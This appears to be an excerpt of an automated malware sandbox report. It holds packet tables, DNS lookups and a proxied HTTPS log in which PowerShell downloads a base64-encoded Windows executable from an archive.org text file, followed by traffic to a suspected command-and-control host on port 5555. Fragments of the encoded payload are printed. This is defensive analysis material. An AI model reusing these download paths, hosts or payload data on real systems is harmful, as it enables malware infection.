                                            Sep 25, 2024 15:26:31.526714087 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.526803970 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.526823997 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.526882887 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.597094059 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.597121954 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.597245932 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.597290993 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.597347975 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.606857061 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.606883049 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.606962919 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.607008934 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.607064962 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.607086897 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.612848043 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.612869978 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.612977982 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.612993002 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.613033056 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.631453037 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.631474018 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.631582975 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.631608009 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.631645918 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.654479980 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.654503107 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.654575109 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.654593945 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.654650927 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.730498075 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.730521917 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.730653048 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.730673075 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.730715990 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.747215986 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.747239113 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.747338057 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.747351885 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.747400999 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.791852951 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.791878939 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.791979074 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.791999102 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.792040110 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.797523022 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.797612906 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.797640085 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.797683954 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.810347080 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:32.448431015 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:32.448472023 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:32.448576927 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:32.449042082 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:32.449059010 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.009257078 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.009474993 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.014529943 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.014545918 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.014852047 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.016310930 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.059407949 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.237783909 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.237838030 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.237950087 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.237963915 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.238497019 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.238564968 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.238571882 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.239686966 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.239721060 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.239753008 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.239762068 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.239810944 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.278165102 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.280251980 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.280322075 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.280333996 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.280780077 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.280864000 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.280872107 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.325927019 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.341157913 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.342775106 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.342840910 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.342850924 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.347232103 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.347311020 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.347317934 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.353442907 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.353575945 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.353583097 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.359833956 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.359981060 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.359992981 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.368036032 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.368067026 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.368115902 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.368124008 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.368201017 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.373967886 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.386542082 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.386620045 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.386626959 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.393735886 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.393815994 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.393822908 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.405528069 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.405647993 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.405657053 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.410301924 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.410343885 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.410378933 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.410384893 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.410429955 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.410437107 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.410461903 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.410505056 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.410835028 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:43.758239031 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:26:43.764242887 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:26:43.764349937 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:26:43.887825012 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:26:43.894865036 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:26:48.914993048 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:26:48.966675997 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:26:56.221498966 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:26:56.226520061 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:26:56.345953941 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:26:56.348027945 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:26:56.352874994 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:27:08.561216116 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:27:08.758155107 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:27:08.886339903 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:27:08.917548895 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:27:09.216651917 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:27:09.826591015 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:27:09.959923029 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:27:09.960056067 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:27:09.960552931 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:27:09.960618019 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:27:09.961307049 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:27:09.961445093 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:27:09.961656094 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:27:09.961693048 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:27:09.961704969 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:27:18.905785084 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:27:18.951112032 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:27:20.904742956 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:27:20.909845114 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:27:21.030072927 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:27:21.031646013 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:27:21.036533117 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:27:33.252620935 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:27:33.257477045 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:27:33.542279005 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:27:33.562566042 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:27:33.567447901 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:27:45.606112003 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:27:45.610992908 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:27:45.733238935 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:27:45.737885952 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:27:45.742752075 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:27:46.373193026 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:27:46.378143072 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:27:46.497478008 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:27:46.499555111 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:27:46.504370928 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:27:48.920022964 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:27:48.966810942 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:27:51.951642036 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:27:51.956706047 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:27:52.076092958 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:27:52.082475901 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:27:52.087430000 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:28:02.765249014 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:28:02.770279884 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:28:02.892901897 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:28:02.894696951 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:28:02.899647951 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:28:13.935941935 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:28:13.940835953 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:28:14.326148033 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:28:14.326621056 CEST555549709135.224.23.113192.168.2.9
                                            Sep 25, 2024 15:28:14.326745033 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:28:14.327131987 CEST497095555192.168.2.9135.224.23.113
                                            Sep 25, 2024 15:28:14.335299015 CEST555549709135.224.23.113192.168.2.9

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Sep 25, 2024 15:26:21.566273928 CEST5274853192.168.2.91.1.1.1
                                            Sep 25, 2024 15:26:21.721223116 CEST53527481.1.1.1192.168.2.9
                                            Sep 25, 2024 15:26:32.437021017 CEST5338453192.168.2.91.1.1.1
                                            Sep 25, 2024 15:26:32.447654009 CEST53533841.1.1.1192.168.2.9

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Sep 25, 2024 15:26:21.566273928 CEST192.168.2.91.1.1.10x6c8Standard query (0)ia600100.us.archive.orgA (IP address)IN (0x0001)false
                                            Sep 25, 2024 15:26:32.437021017 CEST192.168.2.91.1.1.10x5206Standard query (0)paste.eeA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Sep 25, 2024 15:26:21.721223116 CEST1.1.1.1192.168.2.90x6c8No error (0)ia600100.us.archive.org207.241.227.240A (IP address)IN (0x0001)false
                                            Sep 25, 2024 15:26:32.447654009 CEST1.1.1.1192.168.2.90x5206No error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                                            Sep 25, 2024 15:26:32.447654009 CEST1.1.1.1192.168.2.90x5206No error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • ia600100.us.archive.org
                                            • paste.ee

                                            HTTPS Proxied Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.949707207.241.227.2404437348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-25 13:26:22 UTC109OUTGET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1
                                            Host: ia600100.us.archive.org
                                            Connection: Keep-Alive
                                            2024-09-25 13:26:22 UTC606INHTTP/1.1 200 OK
                                            Server: nginx/1.24.0 (Ubuntu)
                                            Date: Wed, 25 Sep 2024 13:26:22 GMT
                                            Content-Type: text/plain; charset=utf-8
                                            Content-Length: 2823512
                                            Last-Modified: Wed, 11 Sep 2024 23:50:18 GMT
                                            Connection: close
                                            ETag: "66e22cba-2b1558"
                                            Strict-Transport-Security: max-age=15724800
                                            Expires: Wed, 25 Sep 2024 19:26:22 GMT
                                            Cache-Control: max-age=21600
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                            Access-Control-Allow-Credentials: true
                                            Accept-Ranges: bytes
                                            2024-09-25 13:26:22 UTC15778INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 42 6f 43 42 62 6f 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 45 59 67 41 41 41 49 41 41 41 41 41 41 41 41 76 6d 55 67 41 41 41 67 41 41 41 41 67 43 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                            Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABoCBboAAAAAAAAAAOAADiELATAAAEYgAAAIAAAAAAAAvmUgAAAgAAAAgCAAAABAAAAgAAAAAgA
                                            2024-09-25 13:26:22 UTC16384INData Raw: 41 41 41 50 34 4d 45 77 42 46 41 67 41 41 41 41 55 41 41 41 41 31 41 41 41 41 4f 41 41 41 41 41 41 41 45 51 4d 52 46 78 45 49 63 35 73 46 41 41 5a 76 63 51 41 41 43 69 41 42 41 41 41 41 66 73 55 49 41 41 52 37 42 51 6b 41 42 44 6e 4a 2f 2f 2f 2f 4a 69 41 41 41 41 41 41 4f 4c 37 2f 2f 2f 38 41 41 4e 30 66 41 41 41 41 49 41 49 41 41 41 42 2b 78 51 67 41 42 48 73 53 43 51 41 45 4f 73 6e 36 2f 2f 38 6d 49 41 41 41 41 41 41 34 76 76 72 2f 2f 78 45 44 62 79 73 41 41 41 6f 57 50 6f 38 41 41 41 41 67 41 51 41 41 41 48 37 46 43 41 41 45 65 77 73 4a 41 41 51 36 6e 66 72 2f 2f 79 59 67 41 51 41 41 41 44 69 53 2b 76 2f 2f 45 67 63 6f 63 41 41 41 43 68 4d 49 49 41 55 41 41 41 42 2b 78 51 67 41 42 48 76 30 43 41 41 45 4f 6e 58 36 2f 2f 38 6d 49 41 59 41 41 41 41 34 61
                                            Data Ascii: AAAP4MEwBFAgAAAAUAAAA1AAAAOAAAAAAAEQMRFxEIc5sFAAZvcQAACiABAAAAfsUIAAR7BQkABDnJ////JiAAAAAAOL7///8AAN0fAAAAIAIAAAB+xQgABHsSCQAEOsn6//8mIAAAAAA4vvr//xEDbysAAAoWPo8AAAAgAQAAAH7FCAAEewsJAAQ6nfr//yYgAQAAADiS+v//EgcocAAAChMIIAUAAAB+xQgABHv0CAAEOnX6//8mIAYAAAA4a
                                            2024-09-25 13:26:23 UTC16384INData Raw: 2f 2f 2f 77 41 52 42 47 39 49 49 77 41 47 62 33 51 41 41 41 6f 54 42 53 41 46 41 41 41 41 4f 44 48 2f 2f 2f 38 41 4f 4e 73 41 41 41 41 67 43 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 4d 41 45 55 67 41 41 41 41 4f 51 49 41 41 47 34 43 41 41 42 61 41 51 41 41 66 51 41 41 41 4d 73 43 41 41 43 4d 41 51 41 41 46 41 45 41 41 4a 77 44 41 41 43 55 41 41 41 41 41 51 4d 41 41 4c 77 41 41 41 41 57 41 41 41 41 33 41 49 41 41 4d 63 42 41 41 43 6a 41 51 41 41 53 67 49 41 41 41 55 41 41 41 43 62 41 67 41 41 58 67 41 41 41 49 45 42 41 41 41 38 41 51 41 41 61 77 45 41 41 42 30 44 41 41 44 38 41 41 41 41 66 77 49 41 41 4f 30 42 41 41 44 68 41 41 41 41 53 77 45 41 41 44 51 41 41 41 42 46 41 41 41 41 49 51 41 41 41 42 4d 43 41 41 41 34 4e 41 49 41 41 42 45 49 4f 6a 30 44 41
                                            Data Ascii: ///wARBG9IIwAGb3QAAAoTBSAFAAAAODH///8AONsAAAAgCAAAADgEAAAA/gwMAEUgAAAAOQIAAG4CAABaAQAAfQAAAMsCAACMAQAAFAEAAJwDAACUAAAAAQMAALwAAAAWAAAA3AIAAMcBAACjAQAASgIAAAUAAACbAgAAXgAAAIEBAAA8AQAAawEAAB0DAAD8AAAAfwIAAO0BAADhAAAASwEAADQAAABFAAAAIQAAABMCAAA4NAIAABEIOj0DA
                                            2024-09-25 13:26:23 UTC16384INData Raw: 38 52 43 53 68 31 41 67 41 47 62 7a 49 6a 41 41 59 52 43 57 2f 47 49 67 41 47 4b 48 59 43 41 41 5a 76 4d 69 4d 41 42 69 68 30 41 67 41 47 45 77 38 67 43 51 41 41 41 48 37 46 43 41 41 45 65 38 49 49 41 41 51 36 7a 50 37 2f 2f 79 59 67 44 51 41 41 41 44 6a 42 2f 76 2f 2f 45 51 49 54 41 79 41 49 41 41 41 41 2f 67 34 4b 41 44 69 72 2f 76 2f 2f 4f 42 73 42 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 37 4d 49 41 41 51 36 6c 76 37 2f 2f 79 59 67 41 41 41 41 41 44 69 4c 2f 76 2f 2f 45 51 45 67 70 30 47 63 33 79 41 44 41 41 41 41 59 79 42 63 44 35 4f 49 59 58 37 46 43 41 41 45 65 38 51 49 41 41 52 68 4b 46 51 43 41 41 59 6f 59 77 49 41 42 68 4d 43 49 42 34 41 41 41 41 34 56 2f 37 2f 2f 78 45 48 4f 6c 6f 42 41 41 41 67 43 67 41 41 41 48 37 46 43 41 41 45 65
                                            Data Ascii: 8RCSh1AgAGbzIjAAYRCW/GIgAGKHYCAAZvMiMABih0AgAGEw8gCQAAAH7FCAAEe8IIAAQ6zP7//yYgDQAAADjB/v//EQITAyAIAAAA/g4KADir/v//OBsBAAAgAAAAAH7FCAAEe7MIAAQ6lv7//yYgAAAAADiL/v//EQEgp0Gc3yADAAAAYyBcD5OIYX7FCAAEe8QIAARhKFQCAAYoYwIABhMCIB4AAAA4V/7//xEHOloBAAAgCgAAAH7FCAAEe
                                            2024-09-25 13:26:23 UTC16384INData Raw: 41 41 4f 4d 37 38 2f 2f 38 52 41 54 6b 71 2f 66 2f 2f 49 41 63 41 41 41 42 2b 78 51 67 41 42 48 76 6b 43 41 41 45 4f 72 50 38 2f 2f 38 6d 49 41 49 41 41 41 41 34 71 50 7a 2f 2f 77 41 41 41 52 41 41 41 41 49 41 71 77 44 35 70 41 46 33 41 41 41 41 41 43 5a 2b 6f 51 41 41 42 42 54 2b 41 53 6f 41 41 42 70 2b 6f 51 41 41 42 43 6f 41 4b 76 34 4a 41 41 42 76 5a 51 41 41 43 69 6f 41 4b 76 34 4a 41 41 42 76 54 51 41 41 43 69 6f 41 4c 67 44 2b 43 51 41 41 4b 50 77 6c 41 41 59 71 4c 67 44 2b 43 51 41 41 4b 4c 45 45 41 41 59 71 4b 76 34 4a 41 41 42 76 2b 51 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 2b 41 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 45 43 4d 41 42 69 6f 41 4c 67 44 2b 43 51 41 41 4b 43 55 42 41 41 6f 71 48 67 41 6f 73 41 51 41 42 69 70 4b 2f 67 6b 41 41
                                            Data Ascii: AAOM78//8RATkq/f//IAcAAAB+xQgABHvkCAAEOrP8//8mIAIAAAA4qPz//wAAARAAAAIAqwD5pAF3AAAAACZ+oQAABBT+ASoAABp+oQAABCoAKv4JAABvZQAACioAKv4JAABvTQAACioALgD+CQAAKPwlAAYqLgD+CQAAKLEEAAYqKv4JAABv+QIABioAKv4JAABv+AIABioAKv4JAABvECMABioALgD+CQAAKCUBAAoqHgAosAQABipK/gkAA
                                            2024-09-25 13:26:23 UTC16384INData Raw: 6f 49 41 41 51 36 59 50 2f 2f 2f 79 59 67 43 41 41 41 41 44 68 56 2f 2f 2f 2f 4f 47 30 41 41 41 41 67 42 77 41 41 41 48 37 46 43 41 41 45 65 37 67 49 41 41 51 36 50 50 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 78 2f 2f 2f 2f 41 41 49 6f 43 77 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 75 67 67 41 42 44 6b 57 2f 2f 2f 2f 4a 69 41 42 41 41 41 41 4f 41 76 2f 2f 2f 38 41 49 49 66 62 73 78 73 67 6d 4f 66 75 4f 6c 67 67 64 4f 74 35 55 57 46 2b 78 51 67 41 42 48 73 43 43 51 41 45 59 53 67 37 41 77 41 47 4b 44 77 44 41 41 5a 36 42 47 39 67 41 41 41 4b 46 79 68 76 41 77 41 47 45 77 49 67 42 67 41 41 41 48 37 46 43 41 41 45 65 37 30 49 41 41 51 36 77 66 37 2f 2f 79 59 67 43 51 41 41 41 44 69 32 2f 76 2f 2f 41 41 51 55 2f 67 45 54 41 53 41 44 41 41 41 41 4f
                                            Data Ascii: oIAAQ6YP///yYgCAAAADhV////OG0AAAAgBwAAAH7FCAAEe7gIAAQ6PP///yYgBAAAADgx////AAIoCwMABiACAAAAfsUIAAR7uggABDkW////JiABAAAAOAv///8AIIfbsxsgmOfuOlggdOt5UWF+xQgABHsCCQAEYSg7AwAGKDwDAAZ6BG9gAAAKFyhvAwAGEwIgBgAAAH7FCAAEe70IAAQ6wf7//yYgCQAAADi2/v//AAQU/gETASADAAAAO
